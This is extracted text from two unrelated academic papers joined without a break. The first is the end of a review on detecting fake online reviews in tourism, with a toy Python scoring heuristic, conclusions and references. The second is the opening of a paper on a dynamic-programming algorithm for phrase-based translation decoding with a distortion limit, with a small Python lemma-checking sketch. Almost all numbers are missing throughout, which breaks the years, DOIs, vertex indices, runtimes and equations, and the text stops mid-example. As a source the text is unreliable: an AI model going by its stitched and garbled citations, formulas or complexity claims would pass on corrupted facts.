zhang, ; li et al., ; ramalingam & chinnaiah, ; reyes-menendez et al., ). reyes-menendez et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. considering that fake reviews have the power to provide more visibility for companies and affect their behavior (lappas, sabnis & valkanas, a; lappas, sabnis & valkanas, b), it is necessary to reinforce the creation of online reviews from real customers, avoid the creation of fake reviews, and develop content strategies to support and promote customers who are willing to write true information for other customers online. 
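to make the point about tracking reviews more concrete, the sketch below scores reviews with a toy heuristic built from behavioral cues reported in the studies surveyed here (extreme ratings, thin reviewer history, short text, heavy first-person use). the thresholds and weights are arbitrary illustrations, not a validated detector and not any platform's actual filter.

```python
from dataclasses import dataclass

@dataclass
class Review:
    rating: int                   # star rating, 1-5
    text: str
    reviewer_review_count: int    # reviews previously written by this profile
    reviewer_account_age_days: int

def suspicion_score(r: Review) -> float:
    """Toy heuristic inspired by cues from the literature reviewed above.
    Higher scores mean more cues are present; weights are illustrative only."""
    score = 0.0
    if r.rating in (1, 5):
        score += 1.0              # extreme rating
    if r.reviewer_review_count < 3:
        score += 1.0              # little posting history
    if r.reviewer_account_age_days < 30:
        score += 0.5              # very new account
    words = r.text.lower().split()
    if len(words) < 20:
        score += 0.5              # lacking detail
    if words and sum(w in ("i", "me", "my") for w in words) / len(words) > 0.10:
        score += 0.5              # heavy first-person use, a cue for simulated sincerity
    return score

reviews = [
    Review(5, "amazing hotel i loved it", 1, 10),
    Review(4, "comfortable stay, friendly staff, rooms a bit dated but clean; "
              "breakfast was varied and the location is convenient for the old town",
           42, 900),
]
flagged = [r for r in reviews if suspicion_score(r) >= 2.0]
print(len(flagged), "review(s) flagged for manual inspection")
```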
implications for researchers despite the extensive scientific research on fake reviews that offers some solutions to counteract them, it is important to continue improving the algorithms of false review detection on social platforms in the tourism sector. to this end, researchers engaged in this field of study should have a thorough understanding of the available results. as demonstrated in the present review, different methods have been used in previous research on false reviews. these include the development of algorithms based on big data from the social platforms themselves (e.g., chang et al., ; li et al., ) as well as sentiment analysis of written comments (chen, guo & deng, ; deng & chen, ; elmurngi & gherbi, ). finally, there is a group of studies that used other methodological approaches (hunt, ; ramalingam & chinnaiah, ). researchers may apply our results to reinforce the theoretical frameworks of their scholarship by correctly choosing a methodological procedure for their research. it is also important to consider the units of analysis for future research studies in this area. we noted that while some studies focused on user profiles (li et al., ), most extant research focused on the content of reviews. in the latter group of studies, attention was paid either to the texts and their linguistic characteristics (e.g., banerjee et al., ; cardoso, silva & almeida, ; chang et al., ) or to the emotions and behavior of users that could be inferred from reviews (e.g., banerjee & chua, ; banerjee et al., ; li, feng & zhang, ; lin et al., ; zhang et al., ). conclusions this exploratory study has defined the scope and identified recent avenues of research on fake online reviews in the tourism industry. interestingly, even though consumers might be aware that some comments are fictitious, they still rely on them to make decisions (manes & tchetchik, ). however, although many studies have investigated the impact of ewom in the tourism industry (mauri & minazzi, ; vermeulen & seegers, ; xie et al., ), further research on the impact of new approaches is necessary to detect fake online reviews for tourism businesses. as suggested by our literature review, to counteract this trend, tourism companies must constantly improve their methods of detecting false reviews. these methods are mainly based on algorithms (banerjee & chua, ; banerjee et al., ), and the improvements are especially based on behavioral approaches (li, feng & zhang, ; zhang et al., ). in addition, in order not to lose their visitors’ trust (ladhari & michaud, ), platforms that allow users to write reviews about their experiences with tourism companies take legal reyes-menendez et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. action against false reviews (hunt, ). when a company spots fake reviews, it has the right to take action. tripadvisor has fought fraudulent reviews in thousands of lawsuits. the systematic review of the literature undertaken in the present study allows us to make the following three conclusions. first, our results demonstrate that there is an ever-growing interest, among scientific and consumer communities alike, in the credibility of online reviews in the tourism sector with an interdisciplinary approach. 
not only have computer science and information systems (e.g., chen, guo & deng, ; chang et al., ; li et al., ; zhang et al., ) published research about fake reviews but also management, business and operation research and management science (e.g., (lappas, sabnis & valkanas, a; lappas, sabnis & valkanas, b; luca & zervas, ); (munzel, ). consumer concern about fake reviews is particularly pronounced (see figs. and ). second, the results of both scientometric analysis and our literature review suggest that the methods of computer science are most frequently used in terms of the development and improvement of the methods to detect false reviews. most publications included in the literature review ( ) fall into the category of algorithms (eight) and sentiment analysis (six), while only a few of them (three) use other methods. third, our systematic review of the literature highlights the importance of further development of new methods for identifying false reviews based on the following criteria: ( ) those based on emotional approaches; ( ) those based on semantic analysis; and ( ) those based on new technologies. some of these methods are based on a behavioral and emotional analysis of the text of reviews in the tourism sector (banerjee & chua, ; li et al., ; luca & zervas, ; munzel, ; zhang et al., ). to this end, sentiment analysis and textual analysis were used (chen, guo & deng, ; deng & chen, ; elmurngi & gherbi, ; lappas, sabnis & valkanas, a; lappas, sabnis & valkanas, b; lin et al., ; zhang et al., ). other methods are focused on the semantic analysis of the reviews (li, feng & zhang, ; luca & zervas, ) and provide guidelines to follow in order to detect fraudulent reviews. some of these clues are based on extreme comments and ratings, as well as on comments lacking detail or reviews where first-person pronouns (e.g., i, me) are widely used to simulate sincerity. finally, some methods to improve the detection of fake reviews are mostly supported by new technologies (li et al., ) and present novel solutions for fake review detection. one of these technologies is the blockchain, which requires proof of payment in order to publish a review. the limitations of this study relate to the number of studies reviewed and the databases consulted. although the authors consulted the main scientific databases—scopus, pubmed, psyinfo, sciencedirect and web of science—there are more databases available for consultation. while our review of the literature has highlighted several important issues related to fake reviews in the tourism sector, further research that would perform in-depth analysis of specific aspects presented in this paper is needed. among such possibilities is using reyes-menendez et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. quantitative techniques to measure the impact of fake reviews on social networking sites. another promising area of future research is studying the behavioral aspects of users who write online reviews for tourism businesses. additional information and declarations funding the authors received no funding for this work. competing interests the authors declare there are no competing interests. author contributions • ana reyes-menendez conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables. 
• jose ramon saura conceived and designed the experiments, performed the experiments, contributed reagents/materials/analysis tools, prepared figures and/or tables, authored or reviewed drafts of the paper. • ferrão filipe performed the experiments, contributed reagents/materials/analysis tools, authored or reviewed drafts of the paper, approved the final draft. data availability the following information was supplied regarding data availability: this is a review article and does not have raw data. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references amstar. . amstar is a reliable and valid measurement tool to assess the method- ological quality of systematic reviews. . available at www.ncbi.nlm.nih.gov/ pubmed/ (accessed on september ). banerjee a, duflo e, glennerster r, kinnan c. . the miracle of microfinance? evidence from a randomized evaluation. american economic journal: applied economics ( ): – doi . /app. . banerjee s, chua ay. . understanding the process of writing fake online reviews. in: ninth international conference on digital information management (icdim ). piscataway: ieee doi . /icdim. . . banerjee s, chua ay, kim j. . using supervised learning to classify authentic and fake online reviews. new york: acm doi . / . . reyes-menendez et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information www.ncbi.nlm.nih.gov/pubmed/ www.ncbi.nlm.nih.gov/pubmed/ http://dx.doi.org/ . /app. http://dx.doi.org/ . /icdim. . http://dx.doi.org/ . / . http://dx.doi.org/ . /peerj-cs. bassett d. . who wants to live forever? living, dying and grieving in our digital society. social sciences ( ): – doi . /socsci . bennett d, yábar dpb, saura jr. . university incubators may be socially valuable, but how effective are they? a case study on business incubators at universities. in: perisortiz m, gómez j, merigó-lindahl j, rueda-armengot c, eds. entrepreneurial universities. innovation, technology, and knowledge management. cham, switzerland: springer doi . / - - - - _ . buhalis d, law r. . progress in information technology and tourism management: years on and years after the internet—the state of etourism research. tourism management ( ): – doi . /j.tourman. . . . cardoso ef, silva rm, almeida ta. . towards automatic filtering of fake reviews. neurocomputing : – doi . /j.neucom. . . . chang t, hsu py, cheng ms, chung cy, chung yl. . detecting fake review with rumor model—case study in hotel review. in: intelligence science and big data engineering. big data and machine learning techniques lecture notes in computer science. – doi . / - - - - _ . chen ry, guo jy, deng xl. . detecting fake reviews of hype about restaurants by sentiment analysis. in: web-age information management lecture notes in computer science. vol . cham: springer, – doi . / - - - - _ . cheng lc, tseng jc, chung ty. . case study of fake web reviews. in: proceedings of the ieee/acm international conference on advances in social networks analysis and mining . new york: acm, – . cheung cm, thadani dr. . the impact of electronic word-of-mouth commu- nication: a literature analysis and integrative model. decision support systems ( ): – doi . /j.dss. . . . chevalier j, mayzlin d. . the effect of word of mouth on sales: online book reviews. journal of marketing research ( ): – doi . /w . 
chew s, metheney e, teague t. . modelling and simulation of the formation of social networks. social sciences ( ): – doi . /socsci . comerio n, strozzi f. . tourism and its economic impact: a literature review using bibliometric tools. tourism economics ( ): – doi . / . deng x, chen r. . sentiment analysis based online restaurants fake reviews hype detection. in: web technologies and applications lecture notes in computer science. cham: springer, – doi . / - - - - _ . elmurngi e, gherbi a. . an empirical study on detecting fake reviews using machine learning techniques. in: seventh international conference on innovative computing technology (intech). doi . /intech. . . elmurngi ei, gherbi a. . unfair reviews detection on amazon reviews using sentiment analysis with supervised learning techniques. journal of computer science ( ): – doi . /jcssp. . . . google trends. . available at www.google.com/trends (accessed on december ). reyes-menendez et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /socsci http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . /j.tourman. . . http://dx.doi.org/ . /j.neucom. . . http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . /j.dss. . . http://dx.doi.org/ . /w http://dx.doi.org/ . /socsci http://dx.doi.org/ . / http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . /intech. . http://dx.doi.org/ . /jcssp. . . www.google.com/trends http://dx.doi.org/ . /peerj-cs. gottschalk sa, mafael a. . cutting through the online review jungle—investigating selective ewom processing. journal of interactive marketing : – doi . /j.intmar. . . . gretzel u, fesenmaier dr, formica s, o’leary jt. . searching for the future: challenges faced by destination marketing organizations. journal of travel research ( ): – doi . / . gretzel u, yoo kh. . use and impact of online travel reviews. in: informa- tion and communication technologies in tourism. vienna: springer, – doi . / - - - - _ . hennig-thurau t, walsh g, walsh g. . electronic word-of-mouth: motives for and consequences of reading customer articulations on the internet. international journal of electronic commerce ( ): – doi . / . . . hubert m, blut m, brock c, backhaus c, eberhardt t. . acceptance of smartphone-based mobile shopping: mobile benefits, customer characteristics, perceived risks, and the impact of application context. psychology & marketing ( ): – doi . /mar. . huete-alcocer n. . a literature review of word of mouth and electronic word of mouth: implications for consumer behavior. frontiers in psychology : – doi . /fpsyg. . . hunt km. . gaming the system: fake online reviews v. consumer law. computer law and security review ( ): – doi . /j.clsr. . . . kazakov s, predvoditeleva m. . how travelers use online and social media channels to make hotel choice decisions. a comparative study of russian federation and american tourists’ online consumer behavior. higher school of economics research paper no. wp brp /man/ doi . /ssrn. . kim s, kandampully j, bilgihan a. . the influence of ewom communications: an application of online social network framework. computers in human behavior : – doi . /j.chb. . . . kollwitz h, papathanassis a. . evaluating cruise demand forecasting practices: a delphi approach. in: gibson p, papathanassis a, milde p, eds. cruise sector challenges. wiesbaden: gabler verlag, – doi . / - - - - _ . kullenberg c, kasperowski d. . what is citizen science?—a scientometric meta- analysis. plos one ( ):e doi . /journal.pone. . 
ladhari r, michaud m. . ewom effects on hotel booking intentions, attitudes, trust, and website perceptions. international journal of hospitality management : – doi . /j.ijhm. . . . lappas t, sabnis g, valkanas g. a. the impact of fake reviews on online visibility: a vulnerability assessment of the hotel industry. information systems research ( ): – doi . /isre. . . lappas t, sabnis g, valkanas g. b. the impact of fake reviews on online visibility: a vulnerability assessment of the hotel industry. information systems research ( ): – doi . /isre. . . reyes-menendez et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /j.intmar. . . http://dx.doi.org/ . / http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . / . . http://dx.doi.org/ . /mar. http://dx.doi.org/ . /fpsyg. . http://dx.doi.org/ . /j.clsr. . . http://dx.doi.org/ . /ssrn. http://dx.doi.org/ . /j.chb. . . http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /j.ijhm. . . http://dx.doi.org/ . /isre. . http://dx.doi.org/ . /isre. . http://dx.doi.org/ . /peerj-cs. li h, chen z, liu b, wei x, shao j. . spotting fake reviews via collective positive- unlabeled learning. in: ieee international conference on data mining. piscataway: ieee doi . /icdm. . . li n, du s, zheng h, xue m, zhu h. . fake reviews tell no tales? dissecting click farming in content-generated social networks. china communications ( ): – doi . /cc. . . li y, feng x, zhang s. . detecting fake reviews utilizing semantic and emotion model. in: rd international conference on information science and control engineering (icisce). piscataway: ieee doi . /icisce. . . lin y, zhu t, wu h, zhang j, wang x, zhou a. . towards online anti-opinion spam: spotting fake reviews from the review sequence. in: ieee/acm interna- tional conference on advances in social networks analysis and mining (asonam ). piscataway: ieee doi . /asonam. . . litvin sw, goldsmith re, pan b. . electronic word-of-mouth in hospitality and tourism management. tourism management ( ): – doi . /j.tourman. . . . luca m, zervas g. . fake it till you make it: reputation, competition, and yelp review fraud. management science ( ): – doi . /mnsc. . . luo y, chen y, zheng w. . a literature review on evaluating tourism destinations. in: isme —information science and management engineering iv—volume : isme. doi . / . luo q, zhong d. . using social network analysis to explain communication characteristics of travel-related electronic word-of-mouth on social networking sites. tourism management : – doi . /j.tourman. . . . manes e, tchetchik a. . the role of electronic word of mouth in reducing infor- mation asymmetry: an empirical investigation of online hotel booking. journal of business research : – doi . /j.jbusres. . . . mauri ag, minazzi r. . web reviews influence on expectations and purchasing intentions of hotel potential customers. international journal of hospitality manage- ment : – doi . /j.ijhm. . . . moher d, liberati a, tetzlaff j, altman dg. . preferred reporting items for systematic reviews and meta-analyses: the prisma statement. journal of clinical epidemiology ( ): – doi . /j.jclinepi. . . . moutinho l, ballantyne r, rate s. . consumer behaviour in tourism. strategic management in tourism : – doi . / . . munar am, jacobsen jk. . motivations for sharing tourism experiences through social media. tourism management : – doi . /j.tourman. . . . munzel a. . 
assisting consumers in detecting fake reviews: the role of identity information disclosure and consensus. journal of retailing and consumer services : – doi . /j.jretconser. . . . Önder i, gunter u. . forecasting tourism demand with google trends for a major european city destination. tourism analysis ( ): – . reyes-menendez et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /icdm. . http://dx.doi.org/ . /cc. . http://dx.doi.org/ . /icisce. . http://dx.doi.org/ . /asonam. . http://dx.doi.org/ . /j.tourman. . . http://dx.doi.org/ . /mnsc. . http://dx.doi.org/ . / http://dx.doi.org/ . /j.tourman. . . http://dx.doi.org/ . /j.jbusres. . . http://dx.doi.org/ . /j.ijhm. . . http://dx.doi.org/ . /j.jclinepi. . . http://dx.doi.org/ . / . http://dx.doi.org/ . /j.tourman. . . http://dx.doi.org/ . /j.jretconser. . . http://dx.doi.org/ . /peerj-cs. pai m, chu h, wang s, chen y. . electronic word of mouth analysis for service experience. expert systems with applications ( ): – doi . /j.eswa. . . . papathanassis a. . revisiting the tourism long-tail scenario. the long tail of tourism : – doi . / - - - - _ . papathanassis a, buhalis d. . exploring the information and communication technologies revolution and visioning the future of tourism, travel and hospi- tality industries, th e-tourism futures forum: ict revolutionising tourism – , guildford. international journal of tourism research ( ): – doi . /jtr. . papathanassis a, knolle f. . exploring the adoption and processing of online holiday reviews: a grounded theory approach. tourism management ( ): – doi . /j.tourman. . . . price dj. . little science, big science. new york: columbia university press doi . /pric . ramalingam d, chinnaiah v. . fake profile detection techniques in large-scale online social networks: a systematic review. computers and electrical engineering : – doi . /j.compeleceng. . . . reyes-menendez a, saura j, alvarez-alonso c. a. understanding #worldenvironmentday user opinions in twitter: a topic-based sentiment analysis approach. international journal of environmental research and public health ( ): – doi . /ijerph . reyes-menendez a, saura jr, martinez-navalon jg. . the impact of e-wom on hotels management reputation: exploring tripadvisor review credibility with the elm model. ieee access ( ) doi . /access. . . reyes-menendez a, saura jr, palos-sánchez p. b. crowdfunding y financiación . . un estudio exploratorio sobre el turismo cultural. international journal of information systems and tourism ( ): – . reyes-menendez a, saura jr, palos-sanchez p, alvarez jm. . understanding user behavioral intention to adopt a search engine that promotes sustainable water management. symmetry ( ): – doi . /sym . riegner c. . word of mouth on the web: the impact of web . on consumer purchase decisions. journal of advertising research ( ): – doi . /s . saura jr, bennett d. . a three-stage methodological process of data text mining: a ugc business intelligence analysis. symmetry-basel doi . /rg. . . . . saura jr, palos-sanchez p, reyes-menendez a. . marketing a través de aplicaciones móviles de turismo (m-tourism). un estudio exploratorio. international journal of world of tourism ( ): – doi . /ijwt. saura jr, palos-sánchez p, suárez lm. . understanding the digital market- ing environment with kpis and web analytics. future internet ( ): – doi . /fi . reyes-menendez et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /j.eswa. . . http://dx.doi.org/ . 
a polynomial-time dynamic programming algorithm for phrase-based decoding with a fixed distortion limit
yin-wen chang, google research, new york, yinwen@google.com
michael collins∗, google research, new york, mjcollins@google.com
abstract decoding of phrase-based translation models in the general case is known to be np-complete, by a reduction from the traveling salesman problem (knight, ).
in practice, phrase-based systems often impose a hard distortion limit that limits the movement of phrases during translation. however, the im- pact on complexity after imposing such a con- straint is not well studied. in this paper, we describe a dynamic programming algorithm for phrase-based decoding with a fixed dis- tortion limit. the runtime of the algorithm is o(nd!lhd+ ) where n is the sentence length, d is the distortion limit, l is a bound on the number of phrases starting at any position in the sentence, and h is related to the maximum number of target language translations for any source word. the algorithm makes use of a novel representation that gives a new perspec- tive on decoding of phrase-based models. introduction phrase-based translation models (koehn et al., ; och and ney, ) are widely used in statisti- cal machine translation. the decoding problem for phrase-based translation models is known to be dif- ficult: the results from knight ( ) imply that in the general case decoding of phrase-based transla- tion models is np-complete. the complexity of phrase-based decoding comes from reordering of phrases. in practice, however, various constraints on reordering are often imposed in phrase-based translation systems. a common constraint is a “distortion limit”, which places a hard constraint on how far phrases can move. the com- plexity of decoding with such a distortion limit is an open question: the np-hardness result from knight ∗on leave from columbia university. ( ) applies to a phrase-based model with no dis- tortion limit. this paper describes an algorithm for phrase- based decoding with a fixed distortion limit whose runtime is linear in the length of the sentence, and for a fixed distortion limit is polynomial in other fac- tors. more specifically, for a hard distortion limit d, and sentence length n, the runtime is o(nd!lhd+ ), where l is a bound on the number of phrases start- ing at any point in the sentence, and h is related to the maximum number of translations for any word in the source language sentence. the algorithm builds on the insight that de- coding with a hard distortion limit is related to the bandwidth-limited traveling salesman problem (btsp) (lawler et al., ). the algorithm is eas- ily amenable to beam search. it is quite different from previous methods for decoding of phrase-based models, potentially opening up a very different way of thinking about decoding algorithms for phrase- based models, or more generally for models in sta- tistical nlp that involve reordering. related work knight ( ) proves that decoding of word-to-word translation models is np-complete, assuming that there is no hard limit on distortion, through a reduc- tion from the traveling salesman problem. phrase- based models are more general than word-to-word models, hence this result implies that phrase-based decoding with unlimited distortion is np-complete. phrase-based systems can make use of both re- ordering constraints, which give a hard “distortion limit” on how far phrases can move, and reorder- ing models, which give scores for reordering steps, often penalizing phrases that move long distances. moses (koehn et al., b) makes use of a distor- tion limit, and a decoding algorithm that makes use transactions of the association for computational linguistics, vol. , pp. – , . action editor: holger schwenk. submission batch: / ; revision batch: / ; published / . c© association for computational linguistics. distributed under a cc-by . license. 
of bit-strings representing which words have been translated. we show in section . of this paper that this can lead to at least n/ bit-strings for an input sentence of length n, hence an exhaustive version of this algorithm has worst-case runtime that is expo- nential in the sentence length. the current paper is concerned with decoding phrase-based models with a hard distortion limit. various other reordering constraints have been considered. zens and ney ( ) and zens et al. ( ) consider two types of hard constraints: the ibm constraints, and the itg (inversion transduc- tion grammar) constraints from the model of wu ( ). they give polynomial time dynamic pro- gramming algorithms for both of these cases. it is important to note that the ibm and itg constraints are different from the distortion limit constraint con- sidered in the current paper. decoding algorithms with itg constraints are further studied by feng et al. ( ) and cherry et al. ( ). kumar and byrne ( ) describe a class of re- ordering constraints and models that can be encoded in finite state transducers. lopez ( ) shows that several translation models can be represented as weighted deduction problems and analyzes their complexities. koehn et al. ( ) describe a beam- search algorithm for phrase-based decoding that is in widespread use; see section for discussion. a number of reordering models have been pro- posed, see for example tillmann ( ), koehn et al. ( a) and galley and manning ( ). denero and klein ( ) consider the phrase alignment problem, that is, the problem of find- ing an optimal phrase-based alignment for a source- language/target-language sentence pair. they show that in the general case, the phrase alignment prob- lem is np-hard. it may be possible to extend the techniques in the current paper to the phrase- alignment problem with a hard distortion limit. various methods for exact decoding of phrase- based translation models have been proposed. za- slavskiy et al. ( ) describe the use of travel- an earlier version of this paper states the complexity of de- coding with a distortion limit as o(i d) where d is the distor- tion limit and i is the number of words in the sentence; however (personal communication from adam lopez) this runtime is an error, and should be o( i) i.e., exponential time in the length of the sentence. a corrected version of the paper corrects this. ing salesman algorithms for phrase-based decod- ing. chang and collins ( ) describe an exact method based on lagrangian relaxation. aziz et al. ( ) describe a coarse-to-fine approach. these al- gorithms all have exponential time runtime (in the length of the sentence) in the worst case. galley and manning ( ) describe a decoding algorithm for phrase-based systems where phrases can have discontinuities in both the source and tar- get languages. the algorithm has some similarities to the algorithm we propose: in particular, it makes use of a state representation that contains a list of disconnected phrases. however, the algorithms dif- fer in several important ways: galley and manning ( ) make use of bit string coverage vectors, giv- ing an exponential number of possible states; in con- trast to our approach, the translations are not formed in strictly left-to-right ordering on the source side. 
background: the traveling salesman problem on bandwidth-limited graphs this section first defines the bandwidth-limited trav- eling salesman problem, then describes a polyno- mial time dynamic programming algorithm for the traveling salesman path problem on bandwidth lim- ited graphs. this algorithm is the algorithm pro- posed by lawler et al. ( ) with small modifica- tions to make the goal a path instead of a cycle, and to consider directed rather than undirected graphs. . bandwidth-limited tspps the input to the problem is a directed graph g = (v,e), where v is a set of vertices and e is a set of directed edges. we assume that v = { , , . . . ,n}. a directed edge is a pair (i,j) where i,j ∈ v , and i = j. each edge (i,j) ∈ e has an associated weight wi,j. given an integer k ≥ , a graph is bandwidth-limited with bandwidth k if ∀(i,j) ∈ e, |i− j| ≤ k the traveling salesman path problem (tspp) on the graph g is defined as follows. we will assume that vertex is the “source” vertex and vertex n is the “sink” vertex. the tspp is to find the minimum cost directed path from vertex to vertex n, which passes through each vertex exactly once. the algorithm is based on the ideas of monien and sudbor- ough ( ) and ratliff and rosenthal ( ). . an algorithm for bandwidth-limited tspps the key idea of the dynamic-programming algo- rithm for tspps is the definition of equivalence classes corresponding to dynamic programming states, and an argument that the number of equiv- alence classes depends only on the bandwidth k. the input to our algorithm will be a directed graph g = (v,e), with weights wi,j, and with bandwidth k. we define a -n path to be any path from the source vertex to the sink vertex n that visits each vertex in the graph exactly once. a -n path is a subgraph (v ′,e′) of g, where v ′ = v and e′ ⊆ e. we will make use of the following definition: definition . for any -n path h, define hj to be the subgraph that h induces on vertices , , . . .j, where ≤ j ≤ n. that is, hj contains the vertices , , . . .j and the edges in h between these vertices. for a given value for j, we divide the vertices v into three sets aj, bj and cj: • aj = { , , . . . , (j −k)} (aj is the empty set if j ≤ k). • bj = { . . .j}\aj. • cj = {j + ,j + , . . . ,n} (cj is the empty set if j = n). note that the vertices in subgraph hj are the union of the sets aj and bj. aj is the empty set if j ≤ k, but bj is always non-empty. the following lemma then applies: lemma . for any -n path h in a graph with bandwidth k, for any ≤ j ≤ n, the subgraph hj has the following properties: . if vertex is in aj, then vertex has degree one. . for any vertex v ∈ aj with v ≥ , vertex v has degree two. . hj contains no cycles. proof. the first and second properties are true be- cause of the bandwidth limit. under the constraint of bandwidth k, any edge (u,v) in h such that for sets x and y we use the notation x \ y to refer to the set difference: i.e., x \ y = {x|x ∈ x and x /∈ y }. u ∈ aj, must have v ∈ aj ∪ bj = hj. this fol- lows because if v ∈ cj = {j + ,j + , . . .n} and u ∈ aj = { , , . . .j − k}, then |u − v| > k. similarly any edge (u,v) ∈ h such that v ∈ aj must have u ∈ aj ∪ bj = hj. it follows that for any vertex u ∈ aj, with u > , there are edges (u,v) ∈ hj and (v′,u) ∈ hj, hence vertex u has degree . for vertex u ∈ aj with u = , there is an edge (u,v) ∈ hj, hence vertex u has degree . the third property (no cycles) is true because hj is a subgraph of h, which has no cycles. 
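as an aside, the degree conditions in this lemma are easy to check mechanically. the following python sketch is illustrative only (it is not part of the original algorithm, and the function names and the toy path are invented): it induces hj from a 1-n path given as an edge list and verifies the degree properties of the vertices in aj.

```python
# illustrative sketch: induce h_j from a 1-n path and check the lemma's degree properties.
# the path is a list of directed edges (u, v) over vertices 1..n; k is the bandwidth.

def induce_subgraph(path_edges, j):
    """return the edges of h_j: edges of the path with both endpoints <= j."""
    return [(u, v) for (u, v) in path_edges if u <= j and v <= j]

def check_lemma_properties(path_edges, j, k):
    """check the degree properties of vertices in a_j = {1, ..., j-k} within h_j."""
    hj = induce_subgraph(path_edges, j)
    degree = {}
    for (u, v) in hj:
        degree[u] = degree.get(u, 0) + 1
        degree[v] = degree.get(v, 0) + 1
    a_j = range(1, max(j - k + 1, 1))      # vertices 1 .. j-k (empty if j <= k)
    for v in a_j:
        expected = 1 if v == 1 else 2      # vertex 1 has degree one, other a_j vertices degree two
        assert degree.get(v, 0) == expected, f"vertex {v} violates the lemma"
    return hj

# toy example: a 1-n path on 6 vertices that respects bandwidth k = 2
path = [(1, 2), (2, 4), (4, 3), (3, 5), (5, 6)]
print(check_lemma_properties(path, j=4, k=2))
```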
it follows that each connected component of hj is a directed path, that the start points of these paths are in the set { }∪ bj, and that the end points of these paths are in the set bj. we now define an equivalence relation on sub- graphs. two subgraphs hj and h′j are in the same equivalence class if the following conditions hold (taken from lawler et al. ( )): . for any vertex v ∈ bj, the degree of v in hj and h′j is the same. . for each path (connected component) in hj there is a path in h′j with the same start and end points, and conversely. the significance of this definition is as follows. assume that h∗ is an optimal -n path in the graph, and that it induces the subgraph hj on vertices . . .j. assume that h′j is another subgraph over vertices . . .j, which is in the same equivalence class as hj. for any subgraph hj, define c(hj) to be the sum of edge weights in hj: c(hj) = ∑ (u,v)∈hj wu,v then it must be the case that c(h′j) ≥ c(hj). oth- erwise, we could simply replace hj by h′j in h ∗, thereby deriving a new -n path with a lower cost, implying that h∗ is not optimal. this observation underlies the dynamic program- ming approach. define σ to be a function that maps a subgraph hj to its equivalence class σ(hj). the equivalence class σ(hj) is a data structure that stores the degrees of the vertices in bj, together with the start and end points of each connected compo- nent in hj. next, define ∆ to be a set of , or edges be- tween vertex (j + ) and the vertices in bj. for any subgraph hj+ of a -n path, there is some ∆, sim- ply found by recording the edges incident to vertex (j + ). for any hj, define τ(σ(hj), ∆) to be the equivalence class resulting from adding the edges in ∆ to the data structure σ(hj). if adding the edges in ∆ to σ(hj) results in an ill-formed subgraph—for example, a subgraph that has one or more cycles— then τ(σ(hj), ∆) is undefined. the following re- currence then defines the dynamic program (see eq. of lawler et al. ( )): α(j + ,s) = min ∆,s′:τ(s′,∆)=s ( α(j,s′) + c(∆) ) here s is an equivalence class over vertices { . . . (j+ )}, and α(s,j+ ) is the minimum score for any subgraph in equivalence class s. the min is taken over all equivalence classes s′ over vertices { . . .j}, together with all possible values for ∆. a dynamic programming algorithm for phrase-based decoding we now describe the dynamic programming algo- rithm for phrase-based decoding with a fixed distor- tion limit. we first give basic definitions for phrase- based decoding, and then describe the algorithm. . basic definitions consider decoding an input sentence consisting of words x . . .xn for some integer n. we assume that x = <s> and xn = </s> where <s> and </s> are the sentence start and end symbols respectively. a phrase-based lexicon specifies a set of possible translations in the form of phrases p = (s,t,e), where s and t are integers such that ≤ s ≤ t ≤ n, and e is a sequence of m ≥ target-language words e . . .em. this signifies that words xs . . .xt in the source language have a translation as e . . .em in the target language. we use s(p), t(p) and e(p) to refer to the three components of a phrase p = (s,t,e), and e (p) . . .em(p) to refer to the words in the target- language string e(p). we assume that ( , ,<s>) and (n,n,</s>) are the only translation entries with s(p) ≤ and t(p) ≥ n respectively. a derivation is then defined as follows: definition (derivations). a derivation is a se- quence of phrases p . . .pl such that • p = ( , ,<s>) and pl = (n,n,</s>). 
• each source word is translated exactly once. • the distortion limit is satisfied for each pair of phrases pi− ,pi, that is: |t(pi− ) + −s(pi)| ≤ d ∀ i = . . .l. where d is an integer specifying the distortion limit in the model. given a derivation p . . .pl, a target-language translation can be obtained by concatenating the target-language strings e(p ) . . .e(pl). the scoring function is defined as follows: f(p . . .pl) = λ(e(p ) . . .e(pl)) + l∑ i= κ(pi) + l∑ i= η ×|t(pi− ) + −s(pi)| ( ) for each phrase p, κ(p) is the translation score for the phrase. the parameter η is the distortion penalty, which is typically a negative constant. λ(e) is a lan- guage model score for the string e. we will assume a bigram language model: λ(e . . .em) = m∑ i= λ(ei|ei− ). the generalization of our algorithm to higher-order n-gram language models is straightforward. the goal of phrase-based decoding is to find y∗ = arg maxy∈y f(y) where y is the set of valid deriva- tions for the input sentence. remark (gap constraint): note that a common restriction used in phrase-based decoding (koehn et al., ; chang and collins, ), is to im- pose an additional “gap constraint” while decod- ing. see chang and collins ( ) for a descrip- tion. in this case it is impossible to have a dynamic- programming state where word xi has not been translated, and where word xi+k has been translated, for k > d. this limits distortions further, and it can be shown in this case that the number of possible bitstrings is o( d) where d is the distortion limit. without this constraint the algorithm of koehn et al. ( ) actually fails to produce translations for many input sentences (chang and collins, ). h = 〈π 〉 = 〈〈( , ,<s> )〉〉 h = 〈π 〉 = 〈〈( , ,<s> )( , , we must )〉〉 h = 〈π 〉 = 〈〈( , ,<s> )( , , we must )( , , also )〉〉 h = 〈π ,π 〉 = 〈〈( , ,<s> )( , , we must )( , , also )〉 , 〈( , , these criticisms )〉〉 h = 〈π ,π 〉 = 〈〈( , ,<s> )( , , we must )( , , also )〉 , 〈( , , these 